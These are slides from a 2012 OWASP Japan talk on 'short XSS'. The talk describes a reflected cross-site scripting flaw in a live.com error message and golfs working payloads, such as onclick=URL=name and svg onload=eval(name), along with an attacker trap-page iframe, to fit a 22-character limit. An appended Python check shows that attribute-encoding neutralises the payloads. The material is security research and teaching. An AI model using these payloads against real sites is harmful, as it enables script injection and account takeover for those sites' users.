
OWASP Japan 2nd local chapter meeting

Short talk of XSS
(Japanese title: 短い XSS の話, "A story about short XSS")

Jun 27 2012
Yosuke HASEGAWA

One day

As always, surfing websites,

just the usual: an XSS was found.

First of all, view-source:

What!?

<!-- Version: "13.000.20177.00" Server: BAYIDSLEG1C38; DateTime: 2012/05/01 15:13:23 --><input type="hidden" value="MESSAGE: A potentially dangerous Request.QueryString value was detected from the client (param="><h1>XSSed</h1><!--").SOURCE: System.Web FORM:" />

https://*.live.com/?param=><h1>XSSed</h1><!--

XSS caused by an unnecessary error message

Microsoft "live.com"
Over https
Needless error message

Interesting, but it doesn't really matter now.

Why not "alert"?

alert is common knowledge for XSSers

Reason

<!-- Version: "13.000.20177.00" Server: BAYIDSLEG1C38; DateTime: 2012/05/01 15:13:23 --><input type="hidden" value="MESSAGE: A potentially dangerous Request.QueryString value was detected from the client (param="><h1>XSSed</h1><!--").SOURCE: System.Web FORM:" />

https://*.live.com/?param=><h1>XSSed</h1><!--

22 letters max.

><h1>XSSed</h1><!-- … 19 letters

XSS under 22 letters is too hard

><script>alert(1)</script> … 26 letters
><script>eval(name)</script> … 28 letters

How many characters does it take to run arbitrary code with XSS?

XSS Golf: Shortest XSS Challenges, by Gareth Heyes

<x/x=&{eval(name)}; … 19 letters (@0x6D6172696F, Netscape 4)
<svg/onload=eval(name) … 22 letters (@0x6D6172696F)

Go back to the XSS

<!-- Version: "13.000.20177.00" Server: BAYIDSLEG1C38; DateTime: 2012/05/01 15:13:23 --><input type="hidden" value="MESSAGE: A potentially dangerous Request.QueryString value was detected from the client (param="><h1>XSSed</h1><!--").SOURCE: System.Web FORM:" />

https://*.live.com/?param=><h1>XSSed</h1><!--

22 letters max.

><h1>XSSed</h1><!--

Impossible? No!

IE has the "URL" property

><i/onclick=URL=name> … 21 letters

// Trap page created by attacker
<iframe src="target" name="javascript:alert(1)">
// or use window.open from JavaScript

Mario Heiderich’s work

Did it!! (XSS Filter is disabled)

Variations

With 22 letters, arbitrary code can be executed

<input type=hidden value=><i/onclick=URL=name> … 20 letters
<input type=text value= onclick=URL=name> … 17 letters
<input type=hidden value=""><i/onclick=URL=name>"> … 22 letters

Run arbitrary code in 22 letters
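Added check, not from the deck: it reconstructs the reflected error message shown on the slides and demonstrates that HTML-attribute-encoding the whole message before inserting it keeps the deck's payloads inside the value attribute, which is the fix the "needless error message" slide points at. The function names (render_unsafe, render_safe, breaks_out) are mine, and Python's html.parser stands in for a browser's tolerant tag parsing.

```python
import html
from html.parser import HTMLParser

# Shape of the ASP.NET request-validation message reflected in the deck:
# the untrusted parameter is echoed, quotes and all, inside a value attribute.
MESSAGE = ('MESSAGE: A potentially dangerous Request.QueryString value was '
           'detected from the client (param="{value}").SOURCE: System.Web FORM:')


def render_unsafe(value):
    # No output encoding: the behaviour the slides show.
    return '<input type="hidden" value="' + MESSAGE.format(value=value) + '" />'


def render_safe(value):
    # Same markup, but the whole message is attribute-encoded before insertion,
    # so quotes and angle brackets become &quot; &lt; &gt; and stay in the value.
    return ('<input type="hidden" value="'
            + html.escape(MESSAGE.format(value=value), quote=True) + '" />')


class TagCollector(HTMLParser):
    # Records every start tag a tolerant HTML parser pulls out of the markup.
    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append((tag, dict(attrs)))


def parse_tags(markup):
    parser = TagCollector()
    parser.feed(markup)
    parser.close()
    return parser.tags


def breaks_out(markup):
    # True when the rendered page contains anything beyond the one intended
    # <input>, or when any parsed attribute is an event handler (on*).
    tags = parse_tags(markup)
    if [name for name, _ in tags] != ['input']:
        return True
    return any(attr.startswith('on') for _, attrs in tags for attr in attrs)


# Payloads quoted on the slides, used here as constructed test input.
DECK_PAYLOADS = ['><h1>XSSed</h1><!--', '><i/onclick=URL=name>']

if __name__ == '__main__':
    for payload in DECK_PAYLOADS:
        print(repr(payload), 'unsafe:', breaks_out(render_unsafe(payload)),
              'safe:', breaks_out(render_safe(payload)))
```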

Shortest JavaScript to run arbitrary code

10 letters: eval(name)
9 letters: eval(URL)
8 letters: URL=name
6 letters: $(URL)

NetAgent http://www.netagent.co.jp/
OWASP Japan 2nd local chapter meeting

Question?

hasegawa@utf-8.jp
hasegawa@netagent.co.jp

@hasegawayosuke

http://utf-8.jp/
